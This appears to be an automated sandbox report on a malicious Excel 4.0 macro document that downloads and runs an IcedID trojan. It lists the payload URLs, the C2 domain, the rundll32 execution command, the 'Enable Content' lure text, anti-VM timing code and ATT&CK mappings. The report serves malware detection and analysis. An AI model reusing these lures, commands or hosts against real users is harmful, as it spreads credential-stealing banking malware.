Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=3038&fmt=gif
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://devices.amazonaws.com?hp=tile&so-exp=below
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://docs.aws.amazon.com/index.html?nc2=h_ql_doc
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://i18n-string.us-west-2.prod.pricing.aws.a2z.com
Source: document-1915351743.xls	String found in binary or memory: https://miraclecollagen.co.za/ds/1802.Dc
Source: document-1915351743.xls	String found in binary or memory: https://miraclecollagen.co.za/ds/1802.gif
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://pages.awscloud.com/AmazonECSAnywherePreview.html?hp=tile&so-exp=below
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://pages.awscloud.com/communication-preferences?trk=homepage
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://pages.awscloud.com/fico-case-study.html?hp=tile&story=fico
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://pages.awscloud.com/zillow-case-study?hp=tile&story=zllw
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://phd.aws.amazon.com/?nc2=h_m_sc
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default&sc_icampaign=
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&src=default
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&src=default
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/manageYourAccount?nc2=h_m_ma
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://press.aboutamazon.com/press-releases/aws
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://s0.awsstatic.com
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.html
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	String found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.html
Source: idefje.ekfd.0.dr	String found in binary or memory: https://sectigo.com/CPS0D
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/awscloud
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://www.amazon.jobs/aws
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://www.twitch.tv/aws
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com/user/AmazonWebServices/Cloud/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443

Source: unknown

HTTPS traffic detected: 197.242.147.47:443 -> 192.168.2.22:49165 version: TLS 1.2

E-Banking Fraud:

Yara detected IcedID

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2324, type: MEMORY
Source: Yara match	File source: 3.2.rundll32.exe.7feea7c0000.10.unpack, type: UNPACKEDPE

System Summary:

Found malicious Excel 4.0 Macro

Show sources

Source: document-1915351743.xls

Initial sample: urlmon

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable Editing" 11 from the yellow bar above 12 13 @Once You have Enable Editing, please click "E
Source: Document image extraction number: 1	Screenshot OCR: Enable Editing" from the yellow bar above Once You have Enable Editing, please click "Enable Conte
Source: Document image extraction number: 1	Screenshot OCR: Enable Content" from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or A
Source: Document image extraction number: 6	Screenshot OCR: Enable Editing" from the yellow bar above @Once You have Enable Editing, please click "EnableConte

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: document-1915351743.xls

Initial sample: EXEC

Found abnormal large hidden Excel 4.0 Macro sheet

Show sources

Source: document-1915351743.xls

Initial sample: Sheet size: 4930

Office process drops PE file

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1802[1].gif			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\idefje.ekfd			Jump to dropped file

Source: document-1915351743.xls

OLE indicator, VBA macros: true

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1802[1].gif 21249CE24600B1FEAC26A2A9883F3C6DE299681A924BE281630BC3869F0F4044
Source: Joe Sandbox View	Dropped File: C:\Users\user\idefje.ekfd 21249CE24600B1FEAC26A2A9883F3C6DE299681A924BE281630BC3869F0F4044

Source: document-1915351743.xls, type: SAMPLE	Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: document-1915351743.xls, type: SAMPLE	Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f

Source: rundll32.exe, 00000003.00000002.2128541191.0000000001C80000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLS@3/11@5/3

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\ADFE0000

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRF112.tmp

Jump to behavior

Source: document-1915351743.xls

OLE indicator, Workbook stream: true

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe rundll32 ..\idefje.ekfd,DllRegisterServer

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\idefje.ekfd,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\idefje.ekfd,DllRegisterServer

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Persistence and Installation Behavior:

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1802[1].gif			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\idefje.ekfd			Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\idefje.ekfd

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1802[1].gif			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\idefje.ekfd			Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\idefje.ekfd

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Windows\System32\rundll32.exe	RDTSC instruction interceptor: First address: 000007FEEAB4E669 second address: 000007FEEABB1B6C instructions: 0x00000000 rdtsc 0x00000002 shld cx, bp, 0000006Dh 0x00000007 dec eax 0x00000008 sub ebp, 00000008h 0x0000000e dec eax 0x0000000f ror ecx, cl 0x00000011 rcl ch, cl 0x00000013 mov dword ptr [ebp+00h], edx 0x00000017 dec eax 0x00000018 sbb ecx, 3CB15AB0h 0x0000001e shr cx, 0019h 0x00000022 mov dword ptr [ebp+04h], eax 0x00000025 mov ecx, dword ptr [ebx] 0x00000027 inc eax 0x00000028 test al, ah 0x0000002a cmp edx, 7DDE4398h 0x00000030 cmc 0x00000031 dec eax 0x00000032 add ebx, 00000004h 0x00000038 test cx, sp 0x0000003b inc ecx 0x0000003c xor ecx, ebx 0x0000003e cmc 0x0000003f inc ecx 0x00000040 test esi, edx 0x00000042 bswap ecx 0x00000044 xor ecx, 065004BBh 0x0000004a jmp 00007F5AB881495Ch 0x0000004f ror ecx, 1 0x00000051 not ecx 0x00000053 jmp 00007F5AB877D7BAh 0x00000058 dec ecx 0x0000005a jmp 00007F5AB889E2D7h 0x0000005f rol ecx, 1 0x00000061 inc ecx 0x00000062 test edx, ebp 0x00000064 bswap ecx 0x00000066 cmp esi, 56D4581Ah 0x0000006c cmc 0x0000006d inc ecx 0x0000006e push ebx 0x0000006f inc cx 0x00000071 neg ebx 0x00000073 xor dword ptr [esp], ecx 0x00000076 inc cx 0x00000078 shl ebx, cl 0x0000007a cmc 0x0000007b inc ecx 0x0000007c pop ebx 0x0000007d dec eax 0x0000007e arpl cx, cx 0x00000080 inc ecx 0x00000081 cmp ch, cl 0x00000083 inc eax 0x00000084 test dh, FFFFFF8Fh 0x00000087 dec esp 0x00000088 add ecx, ecx 0x0000008a jmp 00007F5AB882463Bh 0x0000008f dec eax 0x00000090 lea edx, dword ptr [esp+00000140h] 0x00000097 dec eax 0x00000098 cmp ebp, edx 0x0000009a jmp 00007F5AB883440Ch 0x0000009f ja 00007F5AB8812D85h 0x000000a5 inc ecx 0x000000a6 push ecx 0x000000a7 ret 0x000000a8 mov esi, dword ptr [ebp+00h] 0x000000ac rdtsc
Source: C:\Windows\System32\rundll32.exe	RDTSC instruction interceptor: First address: 000007FEEA7C1C52 second address: 000007FEEA7C1C73 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [ebp-10h], eax 0x00000018 mov dword ptr [ebp-0Ch], ebx 0x0000001b mov dword ptr [ebp-08h], ecx 0x0000001e mov dword ptr [ebp-04h], edx 0x00000021 rdtsc
Source: C:\Windows\System32\rundll32.exe	RDTSC instruction interceptor: First address: 000007FEEA7C1C88 second address: 000007FEEA7C1C95 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1802[1].gif

Jump to dropped file

Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	Binary or memory string: </figure> <h3 id="VMware_Cloud_on_AWS" class="lb-tiny-align-center lb-txt-none lb-txt-white lb-h3 lb-title"> VMware Cloud on AWS</h3>
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	Binary or memory string: <a style="padding-left:30px; padding-right:30px;" href="/vmware/?hp=tile&tile=hybridsol" target="_blank" rel="noopener">
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	Binary or memory string: <img src="//d1.awsstatic.com/webteam/homepage/Hybrid%20Solutions/VMWareCloud_Icon.55cb0bcef2c74b55acdb7155e3524e4b5436ec6e.png" alt="VMWareCloud_Icon" title="VMWareCloud_Icon" class="cq-dd-image" />
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	Binary or memory string: Migrate and extend VMware environments to the AWS Cloud
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	Binary or memory string: <a href="/vmware/?hp=tile&so-exp=below"> VMware Cloud on AWS<span>Build a hybrid cloud without custom hardware</span> </a>
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	Binary or memory string: <a style="padding-left:20px; padding-right:45px;" href="/vmware/?hp=tile&tile=hybridsol" target="_blank" rel="noopener">
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	Binary or memory string: <a href="/rds/vmware/?hp=tile&so-exp=below"> Amazon RDS on VMware<span>Automate on-premises database management</span> </a>

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\System32\rundll32.exe	Network Connect: 143.204.4.74 187
Source: C:\Windows\System32\rundll32.exe	Network Connect: 206.189.10.247 80

Yara detected hidden Macro 4.0 in Excel

Show sources

Source: Yara match

File source: document-1915351743.xls, type: SAMPLE

Lowering of HIPS / PFW / Operating System Security Settings:

Source: C:\Windows\System32\rundll32.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Blob

Jump to behavior

Stealing of Sensitive Information:

Yara detected IcedID

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2324, type: MEMORY
Source: Yara match	File source: 3.2.rundll32.exe.7feea7c0000.10.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected IcedID

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2324, type: MEMORY
Source: Yara match	File source: 3.2.rundll32.exe.7feea7c0000.10.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting31	Path Interception	Process Injection11	Masquerading121	OS Credential Dumping	Security Software Discovery21	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution33	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools11	LSASS Memory	Remote System Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer4	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection11	Security Account Manager	File and Directory Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Scripting31	NTDS	System Information Discovery12	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol4	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Rundll321	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1802[1].gif	8%	Metadefender		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1802[1].gif	41%	ReversingLabs	Win64.Trojan.Ligooc
C:\Users\user\idefje.ekfd	8%	Metadefender		Browse
C:\Users\user\idefje.ekfd	41%	ReversingLabs	Win64.Trojan.Ligooc

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
oskolko.uno	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom	0%	Avira URL Cloud	safe
http://ocsp.rootg2.amazontrust.com08	0%	URL Reputation	safe
http://ocsp.rootg2.amazontrust.com08	0%	URL Reputation	safe
http://ocsp.rootg2.amazontrust.com08	0%	URL Reputation	safe
http://ocsp.rootg2.amazontrust.com08	0%	URL Reputation	safe
http://crl.sca1b.amazontrust.com/sca1b.crl0	0%	URL Reputation	safe
http://crl.sca1b.amazontrust.com/sca1b.crl0	0%	URL Reputation	safe
http://crl.sca1b.amazontrust.com/sca1b.crl0	0%	URL Reputation	safe
http://crl.sca1b.amazontrust.com/sca1b.crl0	0%	URL Reputation	safe
http://ocsp.sca1b.amazontrust.com06	0%	URL Reputation	safe
http://ocsp.sca1b.amazontrust.com06	0%	URL Reputation	safe
http://ocsp.sca1b.amazontrust.com06	0%	URL Reputation	safe
http://ocsp.sca1b.amazontrust.com06	0%	URL Reputation	safe
http://oskolko.uno/om/	0%	Avira URL Cloud	safe
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
http://ocsp.rootca1.amazontrust.com0:	0%	Avira URL Cloud	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://crl.rootg2.amazontrust.com/rootg2.crl0	0%	URL Reputation	safe
http://crl.rootg2.amazontrust.com/rootg2.crl0	0%	URL Reputation	safe
http://crl.rootg2.amazontrust.com/rootg2.crl0	0%	URL Reputation	safe
http://o.ss2.us/0	0%	URL Reputation	safe
http://o.ss2.us/0	0%	URL Reputation	safe
http://o.ss2.us/0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://crt.rootg2.amazontrust.com/rootg2.cer0=	0%	URL Reputation	safe
http://crt.rootg2.amazontrust.com/rootg2.cer0=	0%	URL Reputation	safe
http://crt.rootg2.amazontrust.com/rootg2.cer0=	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://oskolko.uno/	0%	Avira URL Cloud	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://s.ss2.us/r.crl0	0%	URL Reputation	safe
http://s.ss2.us/r.crl0	0%	URL Reputation	safe
http://s.ss2.us/r.crl0	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
dr49lng3n1n2s.cloudfront.net	143.204.4.74	true	false		high
miraclecollagen.co.za	197.242.147.47	true	false		high
oskolko.uno	206.189.10.247	true	true	2%, Virustotal, Browse	unknown
aws.amazon.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://oskolko.uno/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://twitter.com/awscloud	rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra-css/images/logo	rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	false		high
https://a0.awsstatic.com/libra/1.0.373/libra-head.js	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	false		high
https://amazon.com/Y	rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	false		high
https://aws.amazon.com/terms/?nc1=f_pr	rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	false		high
https://dc.ads.linkedin.com/collect/?pid=3038&fmt=gif	rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	false		high
https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.html	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/cn/	rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	false		high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://a0.awsstatic.com/libra-css/images	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/target/1.0.112/aws-target-mediator.js	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/psf/null	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/ar/	rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	false		high
https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom	rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
